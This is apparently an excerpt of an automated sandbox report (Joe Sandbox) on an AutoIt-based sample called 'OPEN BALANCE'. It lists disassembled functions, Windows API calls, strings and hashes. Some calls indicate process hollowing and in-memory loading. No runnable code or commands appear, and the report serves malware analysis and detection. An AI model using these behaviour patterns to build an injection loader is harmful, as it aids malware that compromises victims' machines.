Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 2a0c2536c8f89632150f183001c450e280e4ffae85733940dab8d8c93f73a97b
Instruction ID: c1acbc7b8fed779adf8c77c0e5f27b8200838e1c33d0bf84f6429742c851265c
Opcode Fuzzy Hash: 2a0c2536c8f89632150f183001c450e280e4ffae85733940dab8d8c93f73a97b
Instruction Fuzzy Hash: 5621C3B5A16219AFDB00DFA4E849BDDBBB8FB08701F00821AF621A62A0D7B54544DF91

Function 00878D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c7e6a96df10da6bb1d8cc5f28a2ac7091339732b0c8e8a23130b7874d81deb
Instruction ID: b5c7de41374e256a4d068db4019f2e061b1b9dd0b4a60169574354e83cb03968
Opcode Fuzzy Hash: 91c7e6a96df10da6bb1d8cc5f28a2ac7091339732b0c8e8a23130b7874d81deb
Instruction Fuzzy Hash: 32C1CD75A04249AFCB11DFACD845BADBBB0FF4A310F048199E958E7396CB70C941CB62

Function 014E2600 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014E26D1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014E28F7

Memory Dump Source

Source File: 00000000.00000002.2061131437.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_OPEN BALANCE.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction ID: 11930a34872449505caebf82bd45292c6b19f51121b304b807cd7a72a7e8809e
Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
Instruction Fuzzy Hash: 88A10974E00209EBDB14CFA4C858FEEBBB9FF48305F20865AE505BB290D7B59A41CB54

Function 00842C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00842C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00842CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00841CAD,?), ref: 00842CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00841CAD,?), ref: 00842CCF

Strings

AutoIt v3, xrefs: 00842C89, 00842C8E, 00842C8F
edit, xrefs: 00842CAC

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: d4926f3368c560fb3624083d9edd97a0269cfcbfdb88bdc9d3bdf3f5bdcf3d0a
Instruction ID: e33c2f607f6d81a55c8c63b52818e4731fe6ef6ecf9537b1445fde67244212a0
Opcode Fuzzy Hash: d4926f3368c560fb3624083d9edd97a0269cfcbfdb88bdc9d3bdf3f5bdcf3d0a
Instruction Fuzzy Hash: 18F0DA756542907AEB311717AC08EB76FBDE7C6F50B00825BFA10E26A4C6651852EAB0

Function 014E23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 014E22A0: Sleep.KERNELBASE(000001F4), ref: 014E22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014E24F0

Strings

HAAH7XRUW0TL8G56O, xrefs: 014E2553, 014E2556

Memory Dump Source

Source File: 00000000.00000002.2061131437.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_OPEN BALANCE.jbxd

Similarity

API ID: CreateFileSleep
String ID: HAAH7XRUW0TL8G56O
API String ID: 2694422964-711858751
Opcode ID: cc3faabf7abf00ac06a4006fe52cc373a56f17d19c33c5080fe9103739818cfd
Instruction ID: d874ba77721c0021327c15d4b32bca55439d1ff0bc2dad71f7d114356e17e8ee
Opcode Fuzzy Hash: cc3faabf7abf00ac06a4006fe52cc373a56f17d19c33c5080fe9103739818cfd
Instruction Fuzzy Hash: D8519170D14248DBEF11DBE4C858BEEBBB9AF18300F004199E609BB2D1D7B95B45CBA5

Function 008B2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008B2C05
DeleteFileW.KERNEL32(?), ref: 008B2C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008B2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008B2CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008B2CC0

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: eb6ac219a18f8ea9541b433edea29c677200ac037984c49cde8ddcb882cc6e32
Instruction ID: 797950e37f0911f559c9b6d6cc61c95d1f690a93008718d8679338772960227b
Opcode Fuzzy Hash: eb6ac219a18f8ea9541b433edea29c677200ac037984c49cde8ddcb882cc6e32
Instruction Fuzzy Hash: E4B13F72D0051DABDF21DBA8CC85EDEBB7DFF49350F1040A6F609E6251EA309A448F62

Function 00984710 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 0098484A
GetProcAddress.KERNEL32(?,0097DFF9), ref: 00984868
ExitProcess.KERNEL32(?,0097DFF9), ref: 00984879
VirtualProtect.KERNELBASE(00840000,00001000,00000004,?,00000000), ref: 009848C7
VirtualProtect.KERNELBASE(00840000,00001000), ref: 009848DC

Memory Dump Source

Source File: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 9ecfc1fee9f63090fbac44e95f98961a9ca6be85f098b91a8de335fa6bc866ae
Instruction ID: 929fa667670888f7e98cf42e29c7bf073f81e5e99a9b80b4d7274c7c31c04ffe
Opcode Fuzzy Hash: 9ecfc1fee9f63090fbac44e95f98961a9ca6be85f098b91a8de335fa6bc866ae
Instruction Fuzzy Hash: F8510972A553534FD720AEB8DCC0665BBA8EF533207280739C6E6CB3C5E7A45C068760

Function 00843B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00843B0F,SwapMouseButtons,00000004,?), ref: 00843B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00843B0F,SwapMouseButtons,00000004,?), ref: 00843B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00843B0F,SwapMouseButtons,00000004,?), ref: 00843B83

Strings

Control Panel\Mouse, xrefs: 00843B3E

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a2a0c8f5bc815f58e110434a32da9fe7841975f6ca3798107fe9d5ce9080536e
Instruction ID: bd6f82800b475c6abbe9290e86666ab40cef256974fc573583b5b03378123006
Opcode Fuzzy Hash: a2a0c8f5bc815f58e110434a32da9fe7841975f6ca3798107fe9d5ce9080536e
Instruction Fuzzy Hash: B31127B561160CFFDB218FA5DC84AAEBBB8FF04768B10856AE805D7110E2319E449BA0

Function 014E12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014E1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014E1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014E1B13

Memory Dump Source

Source File: 00000000.00000002.2061131437.00000000014E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_OPEN BALANCE.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction ID: 476442b0a8e6e4883c473883983c93ea830887693419dffd6498ba68e0bcc249
Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction Fuzzy Hash: 06621D30A14258DBEB24CFA4C854BDEB376EF58701F1091A9D10DEB3A0E7769E81CB59

Function 0084DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 008932B7

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: a88bb742204fdeba06c4230ce85f780dffd29748adeedd3f808b0dc22ed63c63
Instruction ID: cb6b8c2f81948959c64ca86e5c2202b8bc5416ca8bf0ddf7980892939ee6b5af
Opcode Fuzzy Hash: a88bb742204fdeba06c4230ce85f780dffd29748adeedd3f808b0dc22ed63c63
Instruction Fuzzy Hash: 08C29B75A00218CFCB24DF98C881AAEB7B1FF18314F288569E956EB391D375ED41CB91

Function 00843923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008833A2

Part of subcall function 00846B57: _wcslen.LIBCMT ref: 00846B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00843A04

Strings

Line: , xrefs: 008833EB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 14f460b8aaea9fc941ad7c5056c7fe1c1f62ec998428257d3dea2a2109842d62
Instruction ID: 061ababe8ab74ba59c3689f11aca4134f9dacc5960edc7d1cfd1bf8c9ecb9a8e
Opcode Fuzzy Hash: 14f460b8aaea9fc941ad7c5056c7fe1c1f62ec998428257d3dea2a2109842d62
Instruction Fuzzy Hash: F831C171508308AAD725EB24DC45BEBBBE8FF41714F10492AF599C2291EB709A49C7C3

Function 0085FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00860668

Part of subcall function 008632A4: RaiseException.KERNEL32(?,?,?,0086068A,?,00911444,?,?,?,?,?,?,0086068A,00841129,00908738,00841129), ref: 00863304

__CxxThrowException@8.LIBVCRUNTIME ref: 00860685

Strings

Unknown exception, xrefs: 00860692

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 005f2ea58119d0f37f4966a5a66fbb73cf545b7e4bf534c3b48fb90971282d31
Instruction ID: cf4f9fe38e62f798e56c2e1a7b258d263ebdc754a12041cde8d9a4894f760abb
Opcode Fuzzy Hash: 005f2ea58119d0f37f4966a5a66fbb73cf545b7e4bf534c3b48fb90971282d31
Instruction Fuzzy Hash: F0F0AF2490030DA7CB00BAA8D84AC9F776CFE50314B614531BA14D6692EF71DA698A86

Function 008B3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 008B302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008B3044

Strings

aut, xrefs: 008B3038

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 63dd385dbe2f4e83f3abbfabeeecffeadc6e58ae65d941c45fd3f67913de6217
Instruction ID: 4a13e9e15f2d13e004b074446cca2050f4997513822bae717fd51f46f8251861
Opcode Fuzzy Hash: 63dd385dbe2f4e83f3abbfabeeecffeadc6e58ae65d941c45fd3f67913de6217
Instruction Fuzzy Hash: 64D05B725013146BDA20A7949C0DFC73B6CD704750F400352F655D20D1DAB09544CAD0

Function 008C7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008C82F5
TerminateProcess.KERNEL32(00000000), ref: 008C82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 008C84DD

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 880c02e09ab8a08bd2ead548b10454c90b2f31a63988a2a47db8ddf51fe71ef7
Instruction ID: eefddef863b53d184a6caa68365f4dd112fba5ef34c09bd1cc339257b0853e1f
Opcode Fuzzy Hash: 880c02e09ab8a08bd2ead548b10454c90b2f31a63988a2a47db8ddf51fe71ef7
Instruction Fuzzy Hash: B8124571A08341DFC724DF28C484B6ABBE5FB89318F04895DE899CB352DB71E945CB92

Function 00875AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6900e2e8b8193ea14373e5ff166fd13b86782e039a8c60e754e84b67c8c3d1
Instruction ID: 9e29a4b54bfc4923c2c71f71bf623b8bde340880eefca4510cec3b17773a4aa9
Opcode Fuzzy Hash: be6900e2e8b8193ea14373e5ff166fd13b86782e039a8c60e754e84b67c8c3d1
Instruction Fuzzy Hash: 7151CE71D006099FCB119FA8C845BBEBBB8FF45324F14805AE408E729AD7B1DA41DB62

Function 008410F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00841BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00841BF4
Part of subcall function 00841BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00841BFC
Part of subcall function 00841BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00841C07
Part of subcall function 00841BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00841C12
Part of subcall function 00841BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00841C1A
Part of subcall function 00841BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00841C22

Part of subcall function 00841B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00841BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0084136A
OleInitialize.OLE32 ref: 00841388
CloseHandle.KERNEL32(00000000,00000000), ref: 008824AB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID:
API String ID: 3094916012-0
Opcode ID: afb6c2a3d2714a31d48241c38b94fbe198ca388e6325b66eef061da060923ed6
Instruction ID: 9653fce5842b38d71df2e7c8864caffbc3a568cf33099b32ca6fca862b07371a
Opcode Fuzzy Hash: afb6c2a3d2714a31d48241c38b94fbe198ca388e6325b66eef061da060923ed6
Instruction Fuzzy Hash: 7571BAB4B39309AEC784DF79A8456D53BE6FB88340744C26AE21AC73B1EB304485EF05

Function 008786AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,008785CC,?,00908CC8,0000000C), ref: 00878704
GetLastError.KERNEL32(?,008785CC,?,00908CC8,0000000C), ref: 0087870E
__dosmaperr.LIBCMT ref: 00878739

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 819c7d4a441aacba1f2bb3af6b7f06919fc39905aca574965bc12b49273d2aec
Instruction ID: ac6ff6a943318c412196d424bbcbd78c710618a007545208bcf10167cd8e41f4
Opcode Fuzzy Hash: 819c7d4a441aacba1f2bb3af6b7f06919fc39905aca574965bc12b49273d2aec
Instruction Fuzzy Hash: AD012F32A45520B6D7246238684E77E6746FB92774F35C119F81CCB2EADEE1DC81C151

Function 008B2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,008B2CD4,?,?,?,00000004,00000001), ref: 008B2FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008B2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008B3006
